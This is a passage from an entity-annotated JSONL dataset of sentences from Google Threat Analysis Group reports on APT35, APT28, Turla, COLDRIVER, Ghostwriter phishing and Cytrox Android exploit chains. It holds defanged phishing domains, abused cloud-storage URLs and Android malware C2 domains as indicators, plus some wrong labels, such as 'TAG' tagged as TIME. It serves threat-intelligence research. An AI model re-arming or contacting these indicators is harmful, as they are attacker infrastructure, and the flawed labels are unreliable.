continue execution.","entities":[],"relations":[],"Comments":[]} -{"id":4914,"text":" A large number of hijacked channels were rebranded for cryptocurrency scam live-streaming.","entities":[],"relations":[],"Comments":[]} -{"id":4915,"text":"The channel name, profile picture and content were all replaced with cryptocurrency branding to impersonate large tech or cryptocurrency exchange firms.","entities":[],"relations":[],"Comments":[]} -{"id":4916,"text":"The attacker live-streamed videos promising cryptocurrency giveaways in exchange for an initial contribution.","entities":[],"relations":[],"Comments":[]} -{"id":4917,"text":"On account-trading markets, hijacked channels ranged from $3 USD to $4,000 USD depending on the number of subscribers.","entities":[],"relations":[],"Comments":[]} -{"id":4918,"text":" These campaigns were carried out by a number of hack-for-hire actors recruited on Russian-speaking forums via the following job description, offering two types of work: This recruitment model explains the highly customized social engineering, as well as the varied malware types given each actor's choice of preferred malware.","entities":[],"relations":[],"Comments":[]} -{"id":4919,"text":" We are continuously improving our detection methods and investing in new tools and features that automatically identify and stop threats like this one.","entities":[],"relations":[],"Comments":[]} -{"id":4920,"text":"Some of these improvements include: It is also important that users remain aware of these types of threats and take appropriate action to further protect themselves.","entities":[],"relations":[],"Comments":[]} -{"id":4921,"text":"Our recommendations: Additional resources: Avoid & Report Phishing Emails.","entities":[],"relations":[],"Comments":[]} -{"id":4922,"text":"Related Malware hashes: Top Phishing Domains:","entities":[],"relations":[],"Comments":[]} -{"id":4923,"text":"Google’s Threat Analysis Group tracks actors involved in disinformation campaigns, government backed hacking, and financially motivated abuse.","entities":[{"id":50937,"label":"identity","start_offset":0,"end_offset":30}],"relations":[],"Comments":[]} -{"id":4924,"text":"We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":50938,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} -{"id":4925,"text":"So far in 2021, we’ve sent over 50,000 warnings, a nearly 33% increase from this time in 2020.","entities":[{"id":50939,"label":"TIME","start_offset":10,"end_offset":14},{"id":50940,"label":"TIME","start_offset":89,"end_offset":93}],"relations":[],"Comments":[]} -{"id":4926,"text":"This spike is largely due to blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear.","entities":[{"id":50942,"label":"threat-actor","start_offset":96,"end_offset":101},{"id":50943,"label":"threat-actor","start_offset":105,"end_offset":115},{"id":50941,"label":"location","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} -{"id":4927,"text":"We intentionally send these warnings in batches to all users who may be at risk, rather than at the moment we detect the threat itself, so that attackers cannot track our defense strategies.","entities":[],"relations":[],"Comments":[]} -{"id":4928,"text":"On any given day, TAG is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries.","entities":[{"id":50944,"label":"identity","start_offset":18,"end_offset":21}],"relations":[],"Comments":[]} -{"id":4929,"text":"This means that there is typically more than one threat actor behind the warnings.","entities":[],"relations":[],"Comments":[]} -{"id":4930,"text":"In this blog, we explore some of the most notable campaigns we’ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":50945,"label":"threat-actor","start_offset":131,"end_offset":136},{"id":50947,"label":"location","start_offset":141,"end_offset":148}],"relations":[{"id":1033,"from_id":50945,"to_id":50947,"type":"located-at"}],"Comments":[]} -{"id":4931,"text":"This is the one of the groups we disrupted during the 2020 US election cycle for its targeting of campaign staffers.","entities":[{"id":50948,"label":"TIME","start_offset":54,"end_offset":58}],"relations":[],"Comments":[]} -{"id":4932,"text":"For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50949,"label":"identity","start_offset":144,"end_offset":162}],"relations":[],"Comments":[]} -{"id":4933,"text":"In early 2021, APT35 compromised a website affiliated with a UK university to host a phishing kit.","entities":[{"id":50951,"label":"threat-actor","start_offset":15,"end_offset":20},{"id":50950,"label":"TIME","start_offset":3,"end_offset":13}],"relations":[],"Comments":[]} -{"id":4934,"text":"Attackers sent email messages with links to this website to harvest credentials for platforms such as Gmail, Hotmail, and Yahoo.","entities":[{"id":50954,"label":"SOFTWARE","start_offset":122,"end_offset":127},{"id":50952,"label":"SOFTWARE","start_offset":102,"end_offset":107},{"id":50953,"label":"SOFTWARE","start_offset":109,"end_offset":116}],"relations":[],"Comments":[]} -{"id":4935,"text":"Users were instructed to activate an invitation to a (fake) webinar by logging in.","entities":[],"relations":[],"Comments":[]} -{"id":4936,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[],"relations":[],"Comments":[]} -{"id":4937,"text":"APT35 has relied on this technique since 2017 — targeting high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security.","entities":[{"id":50955,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":50956,"label":"TIME","start_offset":41,"end_offset":45}],"relations":[],"Comments":[]} -{"id":4938,"text":"Credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – as they know it's difficult for users to detect this kind of attack.","entities":[{"id":50957,"label":"attack-pattern","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} -{"id":4939,"text":"In May 2020, we discovered that APT35 attempted to upload spyware to the Google Play Store.","entities":[{"id":50958,"label":"TIME","start_offset":3,"end_offset":11},{"id":50959,"label":"threat-actor","start_offset":32,"end_offset":37},{"id":50960,"label":"SOFTWARE","start_offset":73,"end_offset":90}],"relations":[],"Comments":[]} -{"id":4940,"text":"The app was disguised as VPN software that, if installed, could steal sensitive information such as call logs, text messages, contacts, and location data from devices.","entities":[],"relations":[],"Comments":[]} -{"id":4941,"text":"Google detected the app quickly and removed it from the Play Store before any users had a chance to install it.","entities":[{"id":50961,"label":"identity","start_offset":0,"end_offset":6},{"id":50962,"label":"SOFTWARE","start_offset":56,"end_offset":66}],"relations":[],"Comments":[]} -{"id":4942,"text":"Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021.","entities":[{"id":50964,"label":"identity","start_offset":78,"end_offset":81},{"id":50965,"label":"threat-actor","start_offset":91,"end_offset":96},{"id":50966,"label":"TIME","start_offset":166,"end_offset":175},{"id":50963,"label":"SOFTWARE","start_offset":9,"end_offset":19}],"relations":[],"Comments":[]} -{"id":4943,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":50967,"label":"threat-actor","start_offset":43,"end_offset":48},{"id":50968,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} -{"id":4944,"text":"Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond.","entities":[],"relations":[],"Comments":[]} -{"id":4945,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":50970,"label":"attack-pattern","start_offset":35,"end_offset":49}],"relations":[],"Comments":[]} -{"id":4946,"text":"Targets typically had to navigate through at least one redirect before landing on a phishing domain.","entities":[],"relations":[],"Comments":[]} -{"id":4947,"text":"Link shorteners and click trackers are heavily used for this purpose, and are oftentimes embedded within PDF files.","entities":[],"relations":[],"Comments":[]} -{"id":4948,"text":"We’ve disrupted attacks using Google Drive, App Scripts, and Sites pages in these campaigns as APT35 tries to get around our defenses.","entities":[{"id":50972,"label":"threat-actor","start_offset":95,"end_offset":100},{"id":50971,"label":"SOFTWARE","start_offset":30,"end_offset":42}],"relations":[],"Comments":[]} -{"id":4949,"text":"Services from Dropbox and Microsoft are also abused.","entities":[{"id":50974,"label":"identity","start_offset":26,"end_offset":35},{"id":50973,"label":"identity","start_offset":14,"end_offset":21}],"relations":[],"Comments":[]} -{"id":4950,"text":"One of APT35’s novel techniques involves using Telegram for operator notifications.","entities":[{"id":50975,"label":"threat-actor","start_offset":7,"end_offset":12},{"id":50976,"label":"SOFTWARE","start_offset":47,"end_offset":55}],"relations":[],"Comments":[]} -{"id":4951,"text":"The attackers embed javascript into phishing pages that notify them when the page has been loaded.","entities":[],"relations":[],"Comments":[]} -{"id":4952,"text":"To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel.","entities":[{"id":50977,"label":"SOFTWARE","start_offset":39,"end_offset":47},{"id":50978,"label":"SOFTWARE","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} -{"id":4953,"text":"The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.","entities":[],"relations":[],"Comments":[]} -{"id":4954,"text":"We reported the bot to Telegram and they have taken action to remove it.","entities":[{"id":50979,"label":"SOFTWARE","start_offset":23,"end_offset":31}],"relations":[],"Comments":[]} -{"id":4955,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":50980,"label":"threat-actor","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} -{"id":4956,"text":"Thousands of these warnings are sent every month, even in cases where the corresponding attack is blocked.","entities":[],"relations":[],"Comments":[]} -{"id":4957,"text":"If you receive a warning it does not mean your account has been compromised, it means you have been identified as a target.","entities":[],"relations":[],"Comments":[]} -{"id":4958,"text":"Workspace administrators are also notified regarding targeted accounts in their domain.","entities":[],"relations":[],"Comments":[]} -{"id":4959,"text":"Users are encouraged to take these warnings seriously and consider enrolling in the Advanced Protection Program or enabling two-factor authentication if they haven't already.","entities":[],"relations":[],"Comments":[]} -{"id":4960,"text":"We also block malicious domains using Google Safe Browsing – a service that Google's security team built to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50982,"label":"identity","start_offset":76,"end_offset":98},{"id":50981,"label":"SOFTWARE","start_offset":38,"end_offset":58}],"relations":[],"Comments":[]} -{"id":4961,"text":"When a user of a Safe Browsing-enabled browser or app attempts to access unsafe content on the web, they’ll see a warning page explaining that the content they’re trying to access may be harmful.","entities":[{"id":50983,"label":"SOFTWARE","start_offset":17,"end_offset":30}],"relations":[],"Comments":[]} -{"id":4962,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[{"id":50984,"label":"SOFTWARE","start_offset":62,"end_offset":75},{"id":50985,"label":"SOFTWARE","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} -{"id":4963,"text":"Threat Analysis Group will continue to identify bad actors and share relevant information with others in the industry, with the goal of bringing awareness to these issues, protecting you and fighting bad actors to prevent future attacks.","entities":[{"id":50986,"label":"identity","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} -{"id":4964,"text":"Indicators from APT28 phishing campaign: service-reset-password-moderate-digital.rf[.]gd reset-service-identity-mail.42web[.]io digital-email-software.great-site[.]net Indicators from APT35 campaigns: Abused Google Properties: https:\/\/sites.google[.]com\/view\/ty85yt8tg8-download-rtih4ithr\/ https:\/\/sites.google[.]com\/view\/user-id-568245\/ https:\/\/sites.google[.]com\/view\/hhbejfdwdhwuhscbsb-xscvhdvbc\/ Abused Dropbox Properties: https:\/\/www.dropbox[.]com\/s\/68y4vpfu8pc3imf\/Iraq&Jewish.pdf Phishing Domains: nco2[.]live summit-files[.]com filetransfer[.]club continuetogo[.]me accessverification[.]online customers-verification-identifier[.]site service-activity-session[.]online identifier-service-review[.]site recovery-activity-identification[.]site review-session-confirmation[.]site recovery-service-activity[.]site verify-service-activity[.]site service-manager-notifications[.]info ","entities":[{"id":50995,"label":"URL","start_offset":430,"end_offset":489},{"id":50987,"label":"threat-actor","start_offset":16,"end_offset":21},{"id":50988,"label":"DOMAIN","start_offset":42,"end_offset":88},{"id":50989,"label":"DOMAIN","start_offset":89,"end_offset":127},{"id":50990,"label":"DOMAIN","start_offset":128,"end_offset":167},{"id":50993,"label":"URL","start_offset":292,"end_offset":339},{"id":50994,"label":"URL","start_offset":340,"end_offset":401},{"id":50996,"label":"DOMAIN","start_offset":509,"end_offset":520},{"id":50997,"label":"DOMAIN","start_offset":521,"end_offset":539},{"id":51001,"label":"DOMAIN","start_offset":606,"end_offset":646},{"id":51002,"label":"DOMAIN","start_offset":647,"end_offset":680},{"id":51003,"label":"DOMAIN","start_offset":681,"end_offset":713},{"id":51004,"label":"DOMAIN","start_offset":714,"end_offset":753},{"id":51005,"label":"DOMAIN","start_offset":754,"end_offset":788},{"id":51006,"label":"DOMAIN","start_offset":789,"end_offset":821},{"id":51007,"label":"DOMAIN","start_offset":822,"end_offset":852},{"id":51008,"label":"DOMAIN","start_offset":853,"end_offset":889},{"id":50991,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":50992,"label":"URL","start_offset":229,"end_offset":290},{"id":50998,"label":"DOMAIN","start_offset":540,"end_offset":559},{"id":50999,"label":"DOMAIN","start_offset":560,"end_offset":577},{"id":51000,"label":"DOMAIN","start_offset":578,"end_offset":605}],"relations":[],"Comments":[]} -{"id":4965,"text":"Android App: https:\/\/www.virustotal.com\/gui\/file\/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5\/detection Android App C2: communication-shield[.]site cdsa[.]xyz","entities":[{"id":51009,"label":"DOMAIN","start_offset":141,"end_offset":168},{"id":51010,"label":"DOMAIN","start_offset":169,"end_offset":179},{"id":15245,"label":"URL","start_offset":13,"end_offset":123}],"relations":[],"Comments":[]} -{"id":4966,"text":"To protect our users, Google’s Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[{"id":51011,"label":"identity","start_offset":22,"end_offset":58}],"relations":[],"Comments":[]} -{"id":4967,"text":"In 2021, we reported nine 0-days affecting Chrome, Android, Apple and Microsoft, leading to patches to protect users from these attacks.","entities":[{"id":51013,"label":"SOFTWARE","start_offset":43,"end_offset":49},{"id":51016,"label":"identity","start_offset":70,"end_offset":79},{"id":51015,"label":"identity","start_offset":60,"end_offset":65},{"id":51012,"label":"TIME","start_offset":3,"end_offset":7},{"id":51014,"label":"SOFTWARE","start_offset":51,"end_offset":58}],"relations":[],"Comments":[]} -{"id":4968,"text":"This blog is a follow up to our July 2021 post on four 0-day vulnerabilities we discovered in 2021, and details campaigns targeting Android users with five distinct 0-day vulnerabilities: We assess with high confidence that these exploits were packaged by a single commercial surveillance company, Cytrox, and sold to different government-backed actors who used them in at least the three campaigns discussed below.","entities":[{"id":51020,"label":"threat-actor","start_offset":298,"end_offset":304},{"id":51017,"label":"TIME","start_offset":32,"end_offset":41},{"id":51019,"label":"SOFTWARE","start_offset":132,"end_offset":139},{"id":51018,"label":"TIME","start_offset":94,"end_offset":98}],"relations":[],"Comments":[]} -{"id":4969,"text":"Consistent with findings from CitizenLab, we assess likely government-backed actors purchasing these exploits are operating (at least) in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain and Indonesia.","entities":[{"id":51025,"label":"location","start_offset":162,"end_offset":173},{"id":51026,"label":"location","start_offset":174,"end_offset":187},{"id":51027,"label":"location","start_offset":189,"end_offset":195},{"id":51029,"label":"location","start_offset":207,"end_offset":216},{"id":51021,"label":"identity","start_offset":30,"end_offset":40},{"id":51023,"label":"location","start_offset":145,"end_offset":152},{"id":51028,"label":"location","start_offset":197,"end_offset":202},{"id":51024,"label":"location","start_offset":154,"end_offset":160},{"id":51022,"label":"location","start_offset":138,"end_offset":143}],"relations":[],"Comments":[]} -{"id":4970,"text":"The 0-day exploits were used alongside n-day exploits as the developers took advantage of the time difference between when some critical bugs were patched but not flagged as security issues and when these patches were fully deployed across the Android ecosystem.","entities":[{"id":51030,"label":"SOFTWARE","start_offset":244,"end_offset":251}],"relations":[],"Comments":[]} -{"id":4971,"text":"Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits.","entities":[],"relations":[],"Comments":[]} -{"id":4972,"text":"Seven of the nine 0-days TAG discovered in 2021 fall into this category: developed by commercial providers and sold to and used by government-backed actors.","entities":[{"id":51031,"label":"identity","start_offset":25,"end_offset":28},{"id":51032,"label":"TIME","start_offset":43,"end_offset":47}],"relations":[],"Comments":[]} -{"id":4973,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.","entities":[{"id":51033,"label":"TIME","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4974,"text":"All three campaigns delivered one-time links mimicking URL shortener services to the targeted Android users via email.","entities":[],"relations":[],"Comments":[]} -{"id":4975,"text":"The campaigns were limited — in each case, we assess the number of targets was in the tens of users.","entities":[],"relations":[],"Comments":[]} -{"id":4976,"text":"Once clicked, the link redirected the target to an attacker-owned domain that delivered the exploits before redirecting the browser to a legitimate website.","entities":[],"relations":[],"Comments":[]} -{"id":4977,"text":"If the link was not active, the user was redirected directly to a legitimate website.","entities":[],"relations":[],"Comments":[]} -{"id":4978,"text":"We've seen this technique used against journalists and other unidentified targets, and alerted those users when possible.","entities":[],"relations":[],"Comments":[]} -{"id":4979,"text":"We assess that these campaigns delivered ALIEN, a simple Android malware in charge of loading PREDATOR, an Android implant described by CitizenLab in December 2021.","entities":[{"id":51036,"label":"TIME","start_offset":150,"end_offset":163},{"id":51034,"label":"malware","start_offset":94,"end_offset":102},{"id":51035,"label":"identity","start_offset":136,"end_offset":146},{"id":15307,"label":"malware","start_offset":41,"end_offset":46}],"relations":[{"id":1034,"from_id":15307,"to_id":51034,"type":"drops"}],"Comments":[]} -{"id":4980,"text":"ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC.","entities":[{"id":51037,"label":"malware","start_offset":76,"end_offset":84},{"id":15312,"label":"malware","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} -{"id":4981,"text":"These commands include recording audio, adding CA certificates, and hiding apps.","entities":[],"relations":[],"Comments":[]} -{"id":4982,"text":"The first campaign, detected in August 2021, used Chrome on a Samsung Galaxy S21 and the web server immediately replied with a HTTP redirect (302) pointing to the following intent URL.","entities":[{"id":51038,"label":"TIME","start_offset":32,"end_offset":43},{"id":51039,"label":"SOFTWARE","start_offset":50,"end_offset":56}],"relations":[],"Comments":[]} -{"id":4983,"text":"This URL abused a logic flaw and forced Chrome to load another URL in the Samsung Browser without user interaction or warnings.","entities":[{"id":51040,"label":"SOFTWARE","start_offset":40,"end_offset":46},{"id":51041,"label":"SOFTWARE","start_offset":74,"end_offset":89}],"relations":[],"Comments":[]} -{"id":4984,"text":" We did not capture the subsequent stages, but assess the attackers did not have exploits for the current version of Chrome (91.0.4472) at that time, but instead used n-day exploits targeting Samsung Browser, which was running an older and vulnerable version of Chromium.","entities":[{"id":51042,"label":"SOFTWARE","start_offset":117,"end_offset":135},{"id":51043,"label":"SOFTWARE","start_offset":192,"end_offset":207},{"id":51044,"label":"SOFTWARE","start_offset":262,"end_offset":270}],"relations":[],"Comments":[]} -{"id":4985,"text":"We assess with high confidence this vulnerability was sold by an exploit broker and probably abused by more than one surveillance vendor.","entities":[],"relations":[],"Comments":[]} -{"id":4986,"text":"More technical details about this vulnerability are available in this RCA by Maddie Stone.","entities":[{"id":51045,"label":"identity","start_offset":77,"end_offset":89}],"relations":[],"Comments":[]} -{"id":4987,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} -{"id":4988,"text":"In September 2021, TAG detected a campaign where the exploit chain was delivered to a fully up-to-date Samsung Galaxy S10 running the latest version of Chrome.","entities":[{"id":51046,"label":"TIME","start_offset":3,"end_offset":17},{"id":51047,"label":"identity","start_offset":19,"end_offset":22},{"id":51048,"label":"SOFTWARE","start_offset":152,"end_offset":158}],"relations":[],"Comments":[]} -{"id":4989,"text":"We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.","entities":[{"id":51049,"label":"SOFTWARE","start_offset":44,"end_offset":58},{"id":51050,"label":"attack-pattern","start_offset":80,"end_offset":91}],"relations":[],"Comments":[]} -{"id":4990,"text":"The sandbox escape was loaded directly as an ELF binary embedding libchrome.so and a custom libmojo_bridge.so was used to ease the communication with the Mojo IPCs.","entities":[],"relations":[],"Comments":[]} -{"id":4991,"text":"This means the renderer exploit did not enable MojoJS bindings like we often see in public exploits.","entities":[],"relations":[],"Comments":[]} -{"id":4992,"text":"Analysis of the exploit identified two different vulnerabilities in Chrome: After escaping the sandbox, the exploit downloaded another exploit in \/data\/data\/com.android.chrome\/p.so to elevate privileges and install the implant.","entities":[{"id":51051,"label":"SOFTWARE","start_offset":68,"end_offset":74},{"id":51052,"label":"FILEPATH","start_offset":146,"end_offset":180}],"relations":[],"Comments":[]} -{"id":4993,"text":"We haven’t retrieved a copy of the exploit.","entities":[],"relations":[],"Comments":[]} -{"id":4994,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} -{"id":4995,"text":"In October 2021, we detected a full chain exploit from an up-to-date Samsung phone running the latest version of Chrome.","entities":[{"id":51053,"label":"TIME","start_offset":3,"end_offset":15},{"id":51054,"label":"SOFTWARE","start_offset":113,"end_offset":119}],"relations":[],"Comments":[]} -{"id":4996,"text":"The chain included two 0-day exploits: Of note, CVE-2021-1048 was fixed in the Linux kernel in September 2020, over a year before this campaign.","entities":[{"id":51055,"label":"vulnerability","start_offset":48,"end_offset":61},{"id":51056,"label":"TIME","start_offset":95,"end_offset":109}],"relations":[],"Comments":[]} -{"id":4997,"text":"The commit was not flagged as a security issue and therefore the patch was not backported in most Android kernels.","entities":[],"relations":[],"Comments":[]} -{"id":4998,"text":"At the time of the exploit, all Samsung kernels were vulnerable; LTS kernels running on Pixel phones were recent enough and included the fix for this bug.","entities":[],"relations":[],"Comments":[]} -{"id":4999,"text":"Unfortunately, this is not the first time we have seen this happen with exploits in the wild; the 2019 Bad Binder vulnerability is another example.","entities":[{"id":51057,"label":"TIME","start_offset":98,"end_offset":102},{"id":51058,"label":"vulnerability","start_offset":103,"end_offset":127}],"relations":[],"Comments":[]} -{"id":5000,"text":"In both cases, the fix was not flagged as a security issue and thus not backported to all (or any) Android kernels.","entities":[{"id":51059,"label":"SOFTWARE","start_offset":99,"end_offset":106}],"relations":[],"Comments":[]} -{"id":5001,"text":"Attackers are actively looking for and profiting from such slowly-fixed vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":5002,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} -{"id":5003,"text":"We’d be remiss if we did not acknowledge the quick response and patching of these vulnerabilities by Google’s Chrome and Android teams.","entities":[{"id":51060,"label":"identity","start_offset":101,"end_offset":134}],"relations":[],"Comments":[]} -{"id":5004,"text":"We would also like to thank Project Zero for their technical assistance in helping analyze these bugs.","entities":[],"relations":[],"Comments":[]} -{"id":5005,"text":"TAG continues to track more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.","entities":[{"id":51061,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":5006,"text":"We remain committed to updating the community as we uncover these campaigns.","entities":[],"relations":[],"Comments":[]} -{"id":5007,"text":"Tackling the harmful practices of the commercial surveillance industry will require a robust, comprehensive approach that includes cooperation among threat intelligence teams, network defenders, academic researchers and technology platforms.","entities":[],"relations":[],"Comments":[]} -{"id":5008,"text":"We look forward to continuing our work in this space and advancing the safety and security of our users around the world.","entities":[],"relations":[],"Comments":[]} -{"id":5009,"text":"NOTE: On May 20th, we updated our attribution to more precisely describe our findings.","entities":[{"id":51062,"label":"TIME","start_offset":9,"end_offset":17}],"relations":[],"Comments":[]} -{"id":5010,"text":"Google’s Threat Analysis Group (TAG) has been closely monitoring the cybersecurity activity in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":51063,"label":"identity","start_offset":0,"end_offset":36},{"id":51064,"label":"location","start_offset":95,"end_offset":109},{"id":51065,"label":"location","start_offset":136,"end_offset":143}],"relations":[],"Comments":[]} -{"id":5011,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":51066,"label":"identity","start_offset":23,"end_offset":26},{"id":51067,"label":"attack-pattern","start_offset":106,"end_offset":122}],"relations":[],"Comments":[]} -{"id":5012,"text":"Similar to other reports, we have also observed threat actors increasingly target critical infrastructure entities including oil and gas, telecommunications and manufacturing.","entities":[],"relations":[],"Comments":[]} -{"id":5014,"text":"Financially motivated and criminal actors are also using current events as a means for targeting users.","entities":[],"relations":[],"Comments":[]} -{"id":5015,"text":"As always, we continue to publish details surrounding the actions we take against coordinated influence operations in our quarterly TAG bulletin.","entities":[{"id":51073,"label":"identity","start_offset":132,"end_offset":135}],"relations":[],"Comments":[]} -{"id":5016,"text":"We promptly identify and remove any such content but have not observed any significant shifts from the normal levels of activity that occur in the region.","entities":[],"relations":[],"Comments":[]} -{"id":5017,"text":"Here is a deeper look at the campaign activity TAG has observed and the actions the team has taken to protect our users over the past few weeks: APT28 or Fancy Bear, a threat actor attributed to Russia GRU, was observed targeting users in Ukraine with a new variant of malware.","entities":[{"id":51078,"label":"location","start_offset":239,"end_offset":246},{"id":51074,"label":"identity","start_offset":47,"end_offset":50},{"id":51075,"label":"threat-actor","start_offset":145,"end_offset":150},{"id":51076,"label":"threat-actor","start_offset":154,"end_offset":164},{"id":51077,"label":"identity","start_offset":195,"end_offset":205}],"relations":[{"id":1035,"from_id":51076,"to_id":51075,"type":"duplicate-of"},{"id":1036,"from_id":51075,"to_id":51077,"type":"attributed-to"},{"id":1037,"from_id":51075,"to_id":51078,"type":"targets"}],"Comments":[]} -{"id":5018,"text":"The malware, distributed via email attachments inside of password protected zip files (ua_report.zip), is a .Net executable that when executed steals cookies and saved passwords from Chrome, Edge and Firefox browsers.","entities":[{"id":51079,"label":"FILEPATH","start_offset":87,"end_offset":100},{"id":51082,"label":"SOFTWARE","start_offset":200,"end_offset":207},{"id":51083,"label":"SOFTWARE","start_offset":108,"end_offset":112},{"id":51080,"label":"SOFTWARE","start_offset":183,"end_offset":189},{"id":51081,"label":"SOFTWARE","start_offset":191,"end_offset":195}],"relations":[],"Comments":[]} -{"id":5019,"text":"The data is then exfiltrated via email to a compromised email account.","entities":[],"relations":[],"Comments":[]} -{"id":5020,"text":"Malware samples:","entities":[],"relations":[],"Comments":[]} -{"id":5021,"text":"TAG would like to thank the Yahoo! Paranoids Advanced Cyber Threats Team for their collaboration in this investigation.","entities":[{"id":51084,"label":"identity","start_offset":0,"end_offset":3},{"id":51085,"label":"identity","start_offset":28,"end_offset":72}],"relations":[],"Comments":[]} -{"id":5022,"text":"Turla, a group TAG attributes to Russia FSB, continues to run campaigns against the Baltics, targeting defense and cybersecurity organizations in the region.","entities":[{"id":51087,"label":"identity","start_offset":15,"end_offset":18},{"id":51086,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":51088,"label":"identity","start_offset":33,"end_offset":43},{"id":51089,"label":"location","start_offset":84,"end_offset":91}],"relations":[{"id":1038,"from_id":51086,"to_id":51088,"type":"attributed-to"},{"id":1039,"from_id":51086,"to_id":51089,"type":"targets"}],"Comments":[]} -{"id":5023,"text":"Similar to recently observed activity, these campaigns were sent via email and contained a unique link per target that led to a DOCX file hosted on attacker controlled infrastructure.","entities":[],"relations":[],"Comments":[]} -{"id":5024,"text":"When opened, the DOCX file would attempt to download a unique PNG file from the same attacker controlled domain.","entities":[],"relations":[],"Comments":[]} -{"id":5025,"text":"Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.","entities":[{"id":51091,"label":"threat-actor","start_offset":33,"end_offset":42},{"id":51092,"label":"threat-actor","start_offset":98,"end_offset":106},{"id":51093,"label":"SOFTWARE","start_offset":125,"end_offset":130},{"id":51094,"label":"identity","start_offset":191,"end_offset":197},{"id":51090,"label":"threat-actor","start_offset":18,"end_offset":23}],"relations":[{"id":1040,"from_id":51092,"to_id":51091,"type":"duplicate-of"},{"id":1041,"from_id":51091,"to_id":51093,"type":"uses"},{"id":1042,"from_id":51091,"to_id":51094,"type":"targets"}],"Comments":[]} -{"id":5026,"text":"The targets include government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[],"relations":[],"Comments":[]} -{"id":5027,"text":"The group's tactics, techniques and procedures (TTPs) for these campaigns have shifted slightly from including phishing links directly in the email, to also linking to PDFs and\/or DOCs hosted on Google Drive and Microsoft One Drive.","entities":[{"id":51096,"label":"SOFTWARE","start_offset":212,"end_offset":231},{"id":51095,"label":"SOFTWARE","start_offset":195,"end_offset":207}],"relations":[],"Comments":[]} -{"id":5028,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[],"relations":[],"Comments":[]} -{"id":5029,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":51097,"label":"SOFTWARE","start_offset":49,"end_offset":69}],"relations":[],"Comments":[]} -{"id":5030,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, has remained active during the course of the war and recently resumed targeting of Gmail accounts via credential phishing.","entities":[{"id":51098,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":51100,"label":"location","start_offset":72,"end_offset":82},{"id":51101,"label":"SOFTWARE","start_offset":180,"end_offset":185},{"id":51102,"label":"attack-pattern","start_offset":199,"end_offset":218},{"id":51099,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1043,"from_id":51099,"to_id":51100,"type":"located-at"},{"id":1044,"from_id":51099,"to_id":51101,"type":"uses"},{"id":1045,"from_id":51099,"to_id":51102,"type":"uses"}],"Comments":[]} -{"id":5032,"text":"If the user clicked continue, they would be redirected to an attacker controlled site that collected the users credentials.","entities":[],"relations":[],"Comments":[]} -{"id":5033,"text":"There were no accounts compromised from this campaign and Google will alert all targeted users of these attempts through our monthly government-backed attacker warnings.","entities":[{"id":51104,"label":"identity","start_offset":58,"end_offset":64}],"relations":[],"Comments":[]} -{"id":5034,"text":"Both pages from this campaign are shown below.","entities":[],"relations":[],"Comments":[]} -{"id":5035,"text":"In mid-April, TAG detected a Ghostwriter credential phishing campaign targeting Facebook 